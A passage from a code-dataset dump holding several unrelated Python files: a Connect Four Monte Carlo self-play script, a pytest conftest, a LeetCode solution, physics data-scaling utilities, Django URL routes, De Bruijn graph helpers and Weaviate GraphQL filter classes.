col)\n node = (row, col)\n\n # check moves that haven't been tried yet\n if node not in payouts.keys():\n return node\n else:\n confidence_interval = calc_conf_interval(payouts[node][0], payouts[node][1], payouts[node][3], total_moves)\n if confidence_interval > max_conf:\n max_move = node\n max_conf = confidence_interval\n\n return max_move\n\n\n# simulates random moves from starting move to determine winner\n# updates wins/draws/losses/samples stats of each node simulated\n# returns number of nodes simulated\ndef simulation(board_copy, move, payouts):\n sequence = []\n player_turn = 2\n total_moves = 1\n\n # move: (row, col)\n 
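# Added comment: play the candidate move first, then finish the game with uniformly random moves; every node visited gets credited in the backpropagation below.\n 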
drop_piece(board_copy, move[0], move[1], player_turn)\n sequence.append(move)\n while not is_terminal_node(board_copy):\n # make a move\n valid_moves = get_valid_locations(board_copy)\n selected_move = random.choice(valid_moves)\n row = get_next_open_row(board_copy, selected_move)\n drop_piece(board_copy, row, selected_move, player_turn)\n total_moves += 1\n\n # add move to sequence\n node = (row, selected_move)\n sequence.append(node)\n\n # switch turns\n if player_turn == 2:\n player_turn = 1\n else:\n player_turn = 2\n\n # [wins, draws, losses, total_trials]\n # backpropagation\n if winning_move(board_copy, PLAYER_PIECE):\n for node in sequence:\n if node not in payouts:\n payouts[node] = [0, 0, 1, 1]\n else:\n # add 1 to losses and total trials\n payouts[node][2] += 1\n payouts[node][3] += 1\n\n elif winning_move(board_copy, AI_PIECE):\n for node in sequence:\n if node not in payouts:\n payouts[node] = [1, 0, 0, 1]\n else:\n # add 1 to wins and total trials\n payouts[node][0] += 1\n payouts[node][3] += 1\n else:\n for node in sequence:\n if node not in payouts:\n payouts[node] = [0, 1, 0, 1]\n else:\n # add 1 to draws and total trials\n payouts[node][1] += 1\n payouts[node][3] += 1\n return total_moves\n\n\ndef get_valid_locations(board):\n valid_locations = []\n for col in range(COLUMN_COUNT):\n if is_valid_location(board, col):\n valid_locations.append(col)\n return valid_locations\n\n\ndef draw_board(board):\n for c in range(COLUMN_COUNT):\n for r in range(ROW_COUNT):\n pygame.draw.rect(screen, BLUE, (c * SQUARESIZE, r * SQUARESIZE + SQUARESIZE, SQUARESIZE, SQUARESIZE))\n pygame.draw.circle(screen, BLACK, (\n int(c * SQUARESIZE + SQUARESIZE / 2), int(r * SQUARESIZE + SQUARESIZE + SQUARESIZE / 2)), RADIUS)\n\n for c in range(COLUMN_COUNT):\n for r in range(ROW_COUNT):\n if board[r][c] == PLAYER_PIECE:\n pygame.draw.circle(screen, RED, (\n int(c * SQUARESIZE + SQUARESIZE / 2), height - int(r * SQUARESIZE + SQUARESIZE / 2)), RADIUS)\n elif board[r][c] == AI_PIECE:\n pygame.draw.circle(screen, YELLOW, (\n int(c * SQUARESIZE + SQUARESIZE / 2), height - int(r * SQUARESIZE + SQUARESIZE / 2)), RADIUS)\n pygame.display.update()\n\n\ndef join_payouts():\n # (fixed) merge the four per-thread payout tables: iterate the union of their keys,\n # copy stats into fresh lists so the per-thread tables are never aliased or mutated,\n # and recompute the grand sample total from scratch on every call\n global grand_total_samples\n grand_total_samples = 0\n for node in set(payouts1) | set(payouts2) | set(payouts3) | set(payouts4):\n totals = [0, 0, 0, 0]\n for payouts in (payouts1, payouts2, payouts3, payouts4):\n if node in payouts:\n for i in range(4):\n totals[i] += payouts[node][i]\n grandPayouts[node] = totals\n grand_total_samples += totals[3]\n return grand_total_samples\n\n\nif __name__ == '__main__':\n board = create_board()\n print_board(board)\n game_over = False\n\n pygame.init()\n\n SQUARESIZE = 100\n\n width = COLUMN_COUNT * SQUARESIZE\n height = (ROW_COUNT + 1) * SQUARESIZE\n\n size = (width, height)\n\n RADIUS = int(SQUARESIZE / 2 - 5)\n\n screen = pygame.display.set_mode(size)\n 
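# Added comment: render the initial empty board once before the self-play loop starts.\n 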
draw_board(board)\n pygame.display.update()\n\n myfont = pygame.font.SysFont(\"monospace\", 75)\n\n turn = random.randint(PLAYER, AI)\n print(turn)\n\n while not game_over:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n if turn == PLAYER:\n # Create new threads\n thread1 = myThread(board, payouts1)\n thread2 = myThread(board, payouts2)\n thread3 = myThread(board, payouts3)\n thread4 = myThread(board, payouts4)\n\n # Start new threads\n thread1.start()\n thread2.start()\n thread3.start()\n thread4.start()\n\n # Add threads to thread list\n threads.append(thread1)\n threads.append(thread2)\n threads.append(thread3)\n threads.append(thread4)\n\n # Wait for all threads to complete\n for t in threads:\n t.join()\n\n # Perform one more selection based on grand total of payouts\n grandTotal = join_payouts()\n AI_move = selection(board, grandTotal, grandPayouts)\n drop_piece(board, AI_move[0], AI_move[1], PLAYER_PIECE)\n if winning_move(board, PLAYER_PIECE):\n label = myfont.render(\"Player 1 wins!!\", 1, RED)\n screen.blit(label, (40, 10))\n game_over = True\n\n print_board(board)\n draw_board(board)\n\n grandPayouts.clear()\n\n turn += 1\n turn = turn % 2\n\n # # Ask for Player 2 Input\n if turn == AI and not game_over:\n # Create new threads\n thread1 = myThread(board, payouts1)\n thread2 = myThread(board, payouts2)\n thread3 = myThread(board, payouts3)\n thread4 = myThread(board, payouts4)\n\n # Start new threads\n thread1.start()\n thread2.start()\n thread3.start()\n thread4.start()\n\n # Add threads to thread list\n threads.append(thread1)\n threads.append(thread2)\n threads.append(thread3)\n threads.append(thread4)\n\n # Wait for all threads to complete\n for t in threads:\n t.join()\n\n # Perform one more selection based on grand total of payouts\n grandTotal = join_payouts()\n AI_move = selection(board, grandTotal, grandPayouts)\n drop_piece(board, AI_move[0], AI_move[1], AI_PIECE)\n if winning_move(board, AI_PIECE):\n label = myfont.render(\"Player 2 wins!!\", 1, YELLOW)\n screen.blit(label, (40, 10))\n game_over = True\n\n print_board(board)\n draw_board(board)\n\n grandPayouts.clear()\n\n turn += 1\n turn = turn % 2\n\n if game_over:\n pygame.time.wait(3000)\n","sub_path":"connect4_ai_vs_ai.py","file_name":"connect4_ai_vs_ai.py","file_ext":"py","file_size_in_byte":11846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"493638216","text":"# Python program that will return true if the two given integer values are equal or their sum or difference is 5.\n\nn1 = int(input(\"Enter first number:\"))\nn2 = int(input(\"Enter second number:\"))\n\nif n1==n2 or abs(n1-n2)==5 or n1+n2==5:\n print(True)\n\nelse:\n print(False)","sub_path":"prac28.py","file_name":"prac28.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"268529435","text":"#\n# See https://github.com/dials/dials/wiki/pytest for documentation on how to\n# write and run pytest tests, and an overview of the available features.\n#\n\n\nfrom __future__ import absolute_import, division, print_function\n\nimport os\nimport warnings\n\nimport pytest\nimport six\n\n# https://stackoverflow.com/a/40846742\nwarnings.filterwarnings(\"ignore\", message=\"numpy.dtype size changed\")\nwarnings.filterwarnings(\"ignore\", message=\"numpy.ufunc size changed\")\n\ncollect_ignore = []\nif six.PY2:\n _base = os.path.dirname(__file__)\n with open(os.path.join(_base, 
\".travis\", \"python2-supported-files\"), \"r\") as fh:\n allowed_testfiles = {tuple(f.strip()[2:].split(\"/\")) for f in fh}\n for root, dirs, files in os.walk(_base):\n relroot = os.path.relpath(root, _base).split(os.path.sep)\n if relroot == [\".\"]:\n relroot = []\n for f in files:\n if f.endswith(\".py\"):\n filetuple = tuple(relroot + [f])\n if filetuple not in allowed_testfiles:\n collect_ignore.append(os.path.join(*filetuple))\n warnings.warn(\n \"%d test files were excluded as they can only be interpreted with Python 3\"\n % len(collect_ignore),\n UserWarning,\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef python3():\n if six.PY2:\n pytest.skip(\"Test requires a Python 3 installation\")\n\n\ndef pytest_addoption(parser):\n \"\"\"Add a '--runslow' option to py.test.\"\"\"\n parser.addoption(\n \"--runslow\", action=\"store_true\", default=False, help=\"run slow tests\"\n )\n\n\ndef pytest_collection_modifyitems(config, items):\n \"\"\"Tests marked as slow will not be run unless slow tests are enabled with\n the '--runslow' parameter or the test is selected specifically. The\n latter allows running slow tests via the libtbx compatibility layer.\"\"\"\n if not config.getoption(\"--runslow\") and len(items) > 1:\n skip_slow = pytest.mark.skip(reason=\"need --runslow option to run\")\n for item in items:\n if \"slow\" in item.keywords:\n item.add_marker(skip_slow)\n\n\ndef pytest_configure(config):\n if not config.pluginmanager.hasplugin(\"dials_data\"):\n\n @pytest.fixture(scope=\"session\")\n def dials_data():\n pytest.skip(\"This test requires the dials_data package to be installed\")\n\n globals()[\"dials_data\"] = dials_data\n\n\n@pytest.fixture(scope=\"session\")\ndef dials_regression():\n \"\"\"Return the absolute path to the dials_regression module as a string.\n Skip the test if dials_regression is not installed.\"\"\"\n try:\n import dials_regression as dr\n\n return os.path.dirname(dr.__file__)\n except ImportError:\n pass # dials_regression not configured\n try:\n import socket\n\n reference_copy = \"/dls/science/groups/scisoft/DIALS/repositories/git-reference/dials_regression\"\n if (\n os.name == \"posix\"\n and socket.gethostname().endswith(\".diamond.ac.uk\")\n and os.path.exists(reference_copy)\n ):\n return reference_copy\n except ImportError:\n pass # can not tell whether in DLS network or not\n pytest.skip(\"dials_regression required for this test\")\n\n\n@pytest.fixture\ndef run_in_tmpdir(tmpdir):\n \"\"\"Shortcut to create a temporary directory and then run the test inside\n this directory.\"\"\"\n tmpdir.chdir()\n return tmpdir\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"247178926","text":"\"\"\"\nGiven a positive integer n and you can do operations as follow:\n\nIf n is even, replace n with n/2.\nIf n is odd, you can replace n with either n + 1 or n - 1.\nWhat is the minimum number of replacements needed for n to become 1?\n\nExample 1:\n\nInput:\n8\n\nOutput:\n3\n\nExplanation:\n8 -> 4 -> 2 -> 1\nExample 2:\n\nInput:\n7\n\nOutput:\n4\n\nExplanation:\n7 -> 8 -> 4 -> 2 -> 1\nor\n7 -> 6 -> 3 -> 2 -> 1\n\"\"\"\n\nclass Solution(object):\n def integerReplacement(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n self.Dict = {}\n self.Dict[1] = 0\n self.Dict[2] = 1\n \n t = 1\n count = 0\n while t <= n:\n t = t*2\n count += 1\n self.Dict[t] = count\n #self.Dict[t] = count\n \n return 
self.recursiveSolution(n)\n \"\"\"\n t = 1\n count = 0\n while t < n:\n count += 1\n t = t*2\n \n if t == n:\n return count\n sig = (t - n < n-t/2) # + if sig is True\n\n count = 0\n \n while n != 1:\n print n\n if n%2 == 0:\n n = n/2\n else:\n if sig:\n n = n+1\n else:\n n = n-1\n count += 1\n \n return count\n \n \"\"\"\n \n def recursiveSolution(self, n):\n \n if n in self.Dict:\n return self.Dict[n]\n #print n\n cand = n-1\n if n%2 == 0:\n cand = min(cand,self.recursiveSolution(n/2)+1)\n else:\n cand = min(cand,self.recursiveSolution(n-1)+1)\n cand = min(cand,self.recursiveSolution(n+1)+1)\n \n self.Dict[n] = cand\n \n return cand\n \n \n \n \n \n \n \n \n ","sub_path":"Algorithms/#397 Integer Replacement/PythonCode.py","file_name":"PythonCode.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"60833182","text":"from sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import RobustScaler, QuantileTransformer, StandardScaler\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport os\nfrom time import time\n\ndata_dir = 'data/data_calibsample/'\nif 'research.utils_rich_mrartemev' != __name__:\n data_dir = '../{}'.format(data_dir)\n\ndef get_particle_dset(particle):\n return [data_dir + name for name in os.listdir(data_dir) if particle in name]\n\nlist_particles = ['kaon', 'pion', 'proton', 'muon', 'electron']\nPARTICLES = list_particles\n\ndatasets = {particle: get_particle_dset(particle) for particle in list_particles} \n\n\ndll_columns = ['RichDLLe', 'RichDLLk', 'RichDLLmu', 'RichDLLp', 'RichDLLbt']\nraw_feature_columns = [ 'Brunel_P', 'Brunel_ETA', 'nTracks_Brunel' ]\nweight_col = 'probe_sWeight'\n \ny_count = len(dll_columns)\nTEST_SIZE = 0.5\n\ndef load_and_cut(file_name):\n data = pd.read_csv(file_name, delimiter='\\t')\n return data[dll_columns+raw_feature_columns+[weight_col]]\n\ndef load_and_merge_and_cut(filename_list):\n return pd.concat([load_and_cut(fname) for fname in filename_list], axis=0, ignore_index=True)\n\ndef split(data):\n data_train, data_val = train_test_split(data, test_size=TEST_SIZE, random_state=42)\n data_val, data_test = train_test_split(data_val, test_size=TEST_SIZE, random_state=1812)\n return data_train.reset_index(drop=True), \\\n data_val .reset_index(drop=True), \\\n data_test .reset_index(drop=True)\n\ndef get_tf_dataset(dataset, batch_size):\n suffled_ds = tf.data.Dataset.from_tensor_slices(dataset).repeat().shuffle(batch_size+1)\n return suffled_ds.batch(batch_size).prefetch(1).make_one_shot_iterator().get_next()\n\ndef scale_pandas(dataframe, scaler):\n return pd.DataFrame(scaler.transform(dataframe.values), columns=dataframe.columns)\n\n\ndef get_all_particles_dataset(dtype=None, log=False, n_quantiles=100000):\n data_train_all = []\n data_val_all = []\n scaler_all = {}\n for index, particle in enumerate(list_particles):\n data_train, data_val, scaler = get_merged_typed_dataset(particle, dtype=dtype, log=log, n_quantiles=n_quantiles)\n ohe_table = pd.DataFrame(np.zeros((len(data_train), len(list_particles))), columns=['is_{}'.format(i) for i in list_particles])\n ohe_table['is_{}'.format(particle)] = 1\n \n data_train_all.append(pd.concat([data_train.iloc[:, :y_count],\n ohe_table, \n data_train.iloc[:, y_count:]], axis=1))\n\n data_val_all.append(pd.concat([data_val.iloc[:, :y_count],\n ohe_table[:len(data_val)].copy(), \n data_val.iloc[:, y_count:]], axis=1))\n scaler_all[index] = scaler\n data_train_all = 
pd.concat(data_train_all, axis=0).astype(dtype, copy=False)\n data_val_all = pd.concat(data_val_all, axis=0).astype(dtype, copy=False)\n return data_train_all, data_val_all, scaler_all\n\n \ndef get_merged_typed_dataset(particle_type, dtype=None, log=False, n_quantiles=100000):\n file_list = datasets[particle_type]\n if log:\n print(\"Reading and concatenating datasets:\")\n for fname in file_list: print(\"\\t{}\".format(fname))\n data_full = load_and_merge_and_cut(file_list)\n # Must split the whole to preserve train/test split\"\"\n if log: print(\"splitting to train/val/test\")\n data_train, data_val, _ = split(data_full)\n if log: print(\"fitting the scaler\")\n print(\"scaler train sample size: {}\".format(len(data_train)))\n start_time = time()\n if n_quantiles == 0:\n scaler = StandardScaler().fit(data_train.drop(weight_col, axis=1).values)\n else:\n scaler = QuantileTransformer(output_distribution=\"normal\",\n n_quantiles=n_quantiles,\n subsample=int(1e10)).fit(data_train.drop(weight_col, axis=1).values)\n print(\"scaler n_quantiles: {}, time = {}\".format(n_quantiles, time()-start_time))\n if log: print(\"scaling train set\")\n data_train = pd.concat([scale_pandas(data_train.drop(weight_col, axis=1), scaler), data_train[weight_col]], axis=1)\n if log: print(\"scaling test set\")\n data_val = pd.concat([scale_pandas(data_val.drop(weight_col, axis=1), scaler), data_val[weight_col]], axis=1)\n if dtype is not None:\n if log: print(\"converting dtype to {}\".format(dtype))\n data_train = data_train.astype(dtype, copy=False)\n data_val = data_val.astype(dtype, copy=False)\n return data_train, data_val, scaler\n","sub_path":"notebooks/rich_utils/utils_rich_mrartemev.py","file_name":"utils_rich_mrartemev.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"606453753","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nfrom blog import views\n\nurlpatterns = patterns('',\n url(r'^$', views.home, name = 'home'),\n url(r'^show/(?P\\d+)/$', views.showPost, name='showPost'),\n url(r'^addComment/(?P\\d+)/$', views.addComment, name='addComment'),\n url(r'^addPost/$', views.addPost, name='addPost'),\n url(r'^editPost/(?P\\d+)/$', views.editPost, name='editPost'),\n url(r'^deletePost/(?P\\d+)/$', views.deletePost, name='deletePost'),\n url(r'^editComment/(?P\\d+)/(?P\\d+)/$', views.editComment, name='editComment'),\n url(r'^deleteComment/(?P\\d+)/(?P\\d+)/$', views.deleteComment, name='deleteComment'),\n url(r'^archiveView/(?P\\w+)/(?P\\d+)/$', views.archiveView, name='archiveView'),\n url(r'^tagView/(?P\\w+)/$', views.tagView, name='tagView'),\n\n)","sub_path":"reincubate_test/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"160720491","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 7 16:01:46 2018\n\n@author: danpal\n\"\"\"\n\nimport itertools\ntry:\n import graph_tool\nexcept ModuleNotFoundError as e:\n print(e.args[0])\n\n\ndef getComposition(text, k):\n comp = []\n for i in range(len(text) - k + 1):\n comp.append(text[i:i+k])\n comp.sort()\n return comp\n\n\ndef getStringSpelledByPath(seq_list):\n string = ''\n for seq in seq_list[:-1]:\n string += seq[0]\n string += seq_list[-1]\n return string\n\n\nclass Vertex:\n def __init__(self, name):\n self.name = name\n self.edges_to = set()\n 
self.edges_from = set()\n\n def addEdgeTo(self, vertex):\n self.edges_to.add(vertex)\n vertex.addEdgeFrom(self)\n\n def addEdgeFrom(self, vertex):\n self.edges_from.add(vertex)\n\n def __hash__(self):\n return hash(self.__repr__)\n\n def __eq__(self, other):\n return self.__repr__() == other.__repr__()\n\n def __repr__(self):\n return f'Vertex({self.name!r})'\n\n\nclass DiGraph:\n def __init__(self, vertices=None):\n self.adj_list = {}\n if vertices is not None:\n for vertex in vertices:\n self.addVertex(vertex)\n\n def addVertex(self, vertex: Vertex):\n self.adj_list[vertex] = vertex.edges_to\n\n def __str__(self):\n text = ''\n for vert in self.adj_list:\n text += f'{vert} -> {\",\".join(self.adj_list[vert])}\\n'\n return text\n\n def __repr__(self):\n return f'DiGraph({list(self.adj_list.keys())!r})'\n\n\ndef getOverlap(seq_list):\n adj_list = {seq: set() for seq in seq_list}\n for seq1, seq2 in itertools.combinations(seq_list, 2):\n if seq1[1:] == seq2[:-1]:\n adj_list[seq1].add(seq2)\n if seq2[1:] == seq1[:-1]:\n adj_list[seq2].add(seq1)\n return adj_list\n\n\ndef printAdjacencyList(adj_list):\n list_ = [f'{vert} -> {\",\".join(adj_list[vert])}' for vert in adj_list]\n print(*list_, sep='\\n')\n\n\ndef getKmerUniversalBinariesBF(k):\n \"\"\"Get all binary strings with the binaries up to 2 ** k exactly once\n\n Brute Force method: INEFICCIENT\n \"\"\"\n binaries = []\n length = 2 ** k + k - 1\n num_kmers = 2 ** k\n for i in range(2 ** length):\n s = set()\n b = bin(i)[2:].zfill(length)\n for j in range(num_kmers):\n s.add(b[j:j+k])\n if len(s) == num_kmers:\n binaries.append(b)\n return binaries\n\n\ndef getDeBruijnGraph(text, k):\n adj_list = {}\n seq_list = []\n for i in range(len(text) - k + 1):\n seq = text[i:i+k]\n seq_list.append(seq)\n adj_list[seq[:-1]] = []\n for seq in seq_list:\n adj_list[seq[:-1]].append(seq[1:])\n\n return adj_list\n\n\ndef plotGraph(adj_list, text, k, file_name):\n d = {}\n graph = graph_tool.Graph()\n v_prop = graph.new_vertex_property('string')\n # e_prop = graph.new_edge_property('string')\n graph.vertex_properties['NodeLabel'] = v_prop\n i = 0\n print(d)\n for i in range(len(text) - k + 2):\n kmer = text[i:i+k-1]\n if kmer not in d:\n v = graph.add_vertex()\n d[kmer] = v\n v_prop[v] = kmer\n for v1 in adj_list:\n for v2 in adj_list[v1]:\n graph.add_edge(d[v1], d[v2])\n graph.save(file_name)\n return graph\n\n\ndef getDeBruijnGraphFromKmers(seq_list):\n adj_list = {seq[:-1]: [] for seq in seq_list}\n for seq in seq_list:\n adj_list[seq[:-1]].append(seq[1:])\n return adj_list\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"python/coursera/bioinf/coursera3.py","file_name":"coursera3.py","file_ext":"py","file_size_in_byte":3532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"249383081","text":"\"\"\"\nGraphQL filters for `Get` and `Aggregate` commands.\nGraphQL abstract class for GraphQL commands to inherit from.\n\"\"\"\nimport json\nimport sys\nfrom copy import deepcopy\nfrom typing import Optional\nfrom abc import ABC, abstractmethod\nfrom weaviate.connect import REST_METHOD_POST, Connection\nfrom weaviate import UnexpectedStatusCodeException, RequestsConnectionError\nfrom weaviate.util import get_vector\n\nclass GraphQL(ABC):\n \"\"\"\n A base abstract class for GraphQL commands, such as Get, Aggregate.\n \"\"\"\n\n def __init__(self, connection: Connection):\n \"\"\"\n Initialize a GraphQL abstract class instance.\n\n Parameters\n ----------\n connection : weaviate.connect.Connection\n 
Connection object to an active and running weaviate instance.\n \"\"\"\n\n self._connection = connection\n\n @abstractmethod\n def build(self) -> str:\n \"\"\"\n Build method to be overloaded by the child classes. It should return the\n GraphQL query as a str.\n\n Returns\n -------\n str\n The query.\n \"\"\"\n\n def do(self) -> dict:\n \"\"\"\n Builds and runs the query.\n\n Returns\n -------\n dict\n The response of the query.\n\n Raises\n ------\n requests.ConnectionError\n If the network connection to weaviate fails.\n weaviate.UnexpectedStatusCodeException\n If weaviate reports a none OK status.\n \"\"\"\n\n query = self.build()\n\n try:\n response = self._connection.run_rest(\"/graphql\", REST_METHOD_POST, {\"query\": query})\n except RequestsConnectionError as conn_err:\n message = str(conn_err) + ' Connection error, query was not successful.'\n raise type(conn_err)(message).with_traceback(sys.exc_info()[2])\n if response.status_code == 200:\n return response.json() # success\n raise UnexpectedStatusCodeException(\"Query was not successful\", response)\n\n\nclass Filter(ABC):\n \"\"\"\n A base abstract class for all filters.\n \"\"\"\n\n def __init__(self, content: dict):\n \"\"\"\n Initialize a Filter class instance.\n\n Parameters\n ----------\n content : dict\n The content of the `Filter` clause.\n \"\"\"\n\n\n if not isinstance(content, dict):\n raise TypeError(f\"{self.__class__.__name__} filter is expected to \"\n f\"be type dict but was {type(content)}\")\n\n @abstractmethod\n def __str__(self) -> str:\n \"\"\"\n Should be implemented in each inheriting class.\n \"\"\"\n\n\nclass NearText(Filter):\n \"\"\"\n NearText class used to filter weaviate objects. Can be used with text models only (text2vec).\n E.g.: text2vec-contextionary, text2vec-transformers.\n \"\"\"\n\n def __init__(self, content: dict):\n \"\"\"\n Initialize a NearText class instance.\n\n Parameters\n ----------\n content : dict\n The content of the `nearText` clause.\n\n Raises\n ------\n TypeError\n If 'content' is not of type dict.\n ValueError\n If 'content' has key \"certainty\" but the value is not float.\n \"\"\"\n\n super().__init__(content)\n\n _content = deepcopy(content)\n _check_concept(_content)\n self.concepts = _content[\"concepts\"]\n self.certainty: Optional[float] = None\n self.move_to: Optional[dict] = None\n self.move_away_from: Optional[dict] = None\n\n if \"certainty\" in _content:\n _check_certainty_type(_content[\"certainty\"])\n self.certainty = _content[\"certainty\"]\n\n if \"moveTo\" in _content:\n _check_direction_clause(_content[\"moveTo\"])\n self.move_to = _content[\"moveTo\"]\n\n if \"moveAwayFrom\" in _content:\n _check_direction_clause(_content[\"moveAwayFrom\"])\n self.move_away_from = _content[\"moveAwayFrom\"]\n\n def __str__(self):\n near_text = f'nearText: {{concepts: {json.dumps(self.concepts)}'\n if self.certainty is not None:\n near_text += f' certainty: {str(self.certainty)}'\n if self.move_to is not None:\n near_text += (\n f' moveTo: {{concepts: {json.dumps(self.move_to[\"concepts\"])} ' +\\\n f'force: {self.move_to[\"force\"]}}}'\n )\n if self.move_away_from is not None:\n near_text += (\n f' moveAwayFrom: {{concepts: {json.dumps(self.move_away_from[\"concepts\"])} ' +\\\n f'force: {self.move_away_from[\"force\"]}}}'\n )\n return near_text + '} '\n\n\nclass NearVector(Filter):\n \"\"\"\n NearVector class used to filter weaviate objects.\n \"\"\"\n\n def __init__(self, content: dict):\n \"\"\"\n Initialize a NearVector class instance.\n\n Parameters\n ----------\n 
content : list\n The content of the `nearVector` clause.\n\n Raises\n ------\n TypeError\n If 'content' is not of type dict.\n ValueError\n If 'content' does not contain \"vector\".\n TypeError\n If 'content[\"vector\"]' is not of type list.\n AttributeError\n If invalid 'content' keys are provided.\n ValueError\n If 'content' has key \"certainty\" but the value is not float.\n \"\"\"\n\n super().__init__(content)\n\n _content = deepcopy(content)\n if \"vector\" not in content:\n raise ValueError(\"No 'vector' key in `content` argument.\")\n self.vector = get_vector(_content['vector'])\n self.certainty: Optional[float] = None\n\n # Check optional fields\n\n if \"certainty\" in _content:\n _check_certainty_type(_content[\"certainty\"])\n self.certainty = _content[\"certainty\"]\n\n def __str__(self):\n near_vector = f'nearVector: {{vector: {json.dumps(self.vector)}'\n if self.certainty is not None:\n near_vector += f' certainty: {self.certainty}'\n return near_vector + '} '\n\n\nclass NearObject(Filter):\n \"\"\"\n NearObject class used to filter weaviate objects.\n \"\"\"\n\n def __init__(self, content: dict):\n \"\"\"\n Initialize a NearVector class instance.\n\n Parameters\n ----------\n content : list\n The content of the `nearVector` clause.\n\n Raises\n ------\n TypeError\n If 'content' is not of type dict.\n ValueError\n If 'content' has key \"certainty\" but the value is not float.\n TypeError\n If 'id'/'beacon' key does not have a value of type str!\n \"\"\"\n\n super().__init__(content)\n\n if ('id' in content) == ('beacon' in content):\n raise ValueError(\"The 'content' argument should contain EITHER `id` OR `beacon`!\")\n\n if 'id' in content:\n self.obj_id = 'id'\n else:\n self.obj_id = 'beacon'\n\n if not isinstance(content[self.obj_id], str):\n raise TypeError(\"The 'id'/'beacon' should be of type string! Given type\"\n + str(type(content[self.obj_id])))\n\n if \"certainty\" in content:\n _check_certainty_type(content[\"certainty\"])\n\n self._content = deepcopy(content)\n\n def __str__(self):\n\n near_object = f'nearObject: {{{self.obj_id}: {self._content[self.obj_id]}'\n if 'certainty' in self._content:\n near_object += f' certainty: {self._content[\"certainty\"]}'\n return near_object + '} '\n\n\nclass Ask(Filter):\n \"\"\"\n Ask class used to filter weaviate objects by asking a question.\n \"\"\"\n\n def __init__(self, content: dict):\n \"\"\"\n Initialize a Ask class instance.\n\n Parameters\n ----------\n content : list\n The content of the `ask` clause.\n\n Raises\n ------\n TypeError\n If 'content' is not of type dict.\n ValueError\n If 'content' has key \"certainty\" but the value is not float.\n TypeError\n If 'content' has key \"properties\" but the type is not list or str.\n \"\"\"\n\n super().__init__(content)\n\n if 'question' not in content:\n raise ValueError('Mandatory \"question\" key not present in the \"content\"!')\n\n if not isinstance(content['question'], str):\n raise TypeError('\"question\" key value should be of the type str. Given: '\n + str(type(content[\"question\"])))\n\n if 'certainty' in content:\n _check_certainty_type(content[\"certainty\"])\n\n self._content = deepcopy(content)\n\n if 'properties' in content:\n if isinstance(content['properties'], str):\n self._content['properties'] = [content['properties']]\n elif not isinstance(content['properties'], list):\n raise TypeError(\"'properties' should be of type list or str! 
Given type: \"\n                            + str(type(content['properties'])))\n\n    def __str__(self):\n        ask = f'ask: {{question: \\\"{self._content[\"question\"]}\\\"'\n        if 'certainty' in self._content:\n            ask += f' certainty: {self._content[\"certainty\"]}'\n        if 'properties' in self._content:\n            ask += f' properties: {json.dumps(self._content[\"properties\"])}'\n        return ask + '} '\n\n\nclass NearImage(Filter):\n    \"\"\"\n    NearImage class used to filter weaviate objects.\n    \"\"\"\n\n    def __init__(self, content: dict):\n        \"\"\"\n        Initialize a NearImage class instance.\n\n        Parameters\n        ----------\n        content : list\n            The content of the `nearImage` clause.\n\n        Raises\n        ------\n        TypeError\n            If 'content' is not of type dict.\n        TypeError\n            If 'content[\"image\"]' is not of type str.\n        ValueError\n            If 'content' has key \"certainty\" but the value is not float.\n        \"\"\"\n\n        super().__init__(content)\n\n        if 'image' not in content:\n            raise ValueError('\"content\" is missing the mandatory key \"image\"!')\n        if not isinstance(content['image'], str):\n            raise TypeError('the \"image\" value should be of type str, given '\n                            f'{type(content[\"image\"])}')\n\n        if \"certainty\" in content:\n            _check_certainty_type(content[\"certainty\"])\n\n        self._content = deepcopy(content)\n\n\n    def __str__(self):\n        near_image = f'nearImage: {{image: {self._content[\"image\"]}'\n        if 'certainty' in self._content:\n            near_image += f' certainty: {self._content[\"certainty\"]}'\n        return near_image + '} '\n\n\nclass Where(Filter):\n    \"\"\"\n    Where filter class used to filter weaviate objects.\n    \"\"\"\n\n    def __init__(self, content: dict):\n        \"\"\"\n        Initialize a Where filter class instance.\n\n        Parameters\n        ----------\n        content : dict\n            The content of the `where` filter clause.\n\n        Raises\n        ------\n        TypeError\n            If 'content' is not of type dict.\n        ValueError\n            If a mandatory key is missing in the filter content.\n        \"\"\"\n\n        super().__init__(content)\n\n        if \"path\" in content:\n            self.is_filter = True\n            self._parse_filter(content)\n        elif \"operands\" in content:\n            self.is_filter = False\n            self._parse_operator(content)\n        else:\n            raise ValueError(\"Filter is missing required fields `path` or `operands`.\"\n                             f\" Given: {content}\")\n\n    def _parse_filter(self, content: dict) -> None:\n        \"\"\"\n        Set filter fields for the Where filter.\n\n        Parameters\n        ----------\n        content : dict\n            The content of the `where` filter clause.\n\n        Raises\n        ------\n        ValueError\n            If 'content' is missing required fields.\n        \"\"\"\n\n        if \"operator\" not in content:\n            raise ValueError(\"Filter is missing required field `operator`. 
